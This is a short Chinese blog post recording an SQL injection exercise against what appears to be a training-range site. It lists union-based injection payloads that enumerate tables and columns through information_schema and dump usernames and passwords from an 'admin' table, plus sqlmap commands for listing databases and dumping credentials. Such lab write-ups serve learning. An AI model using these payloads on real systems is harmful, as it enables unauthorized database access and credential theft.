SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
石一峰69926 分钟前
驱动:私有数据为什么要在三个地方各挂一遍?
数据库·python·算法
ClouGence1 小时前
跨云、跨地域数据同步,这样更省心
数据库·sql·saas
TDengine (老段)2 小时前
TDengine 函数完整参考 — 聚合、时序、字符串、时间、数学
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
CypressTel2 小时前
JADEPUFFER暴露企业安全防御新挑战——赛柏特安全观察
安全
TDengine (老段)2 小时前
昆仑数智选择 TDengine TSDB,提升页岩气生产运行可视化与精细化管理能力
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
陆水A2 小时前
【问数系统】SQL跑对了图表却空了?打通问数系统最后1公里的3个API坑
大数据·数据库·自然语言处理·big data·etl工程师
海外数字观察家3 小时前
品未云:泰国华商批发零售一体化 ERP,破解本土软件适配难题|CSDN 技术分享
网络·数据库·人工智能
上海云盾-小余3 小时前
流量攻击详解:区分带宽耗尽与资源耗尽两类攻击
爬虫·安全·ddos
科力锐品牌君3 小时前
医院数据存储“乱象”:如何兼顾兼容、高效与合规?
大数据·安全·备份·存储·存储方案
躺不平的理查德3 小时前
SQLite C API 备忘录
c语言·数据库·sqlite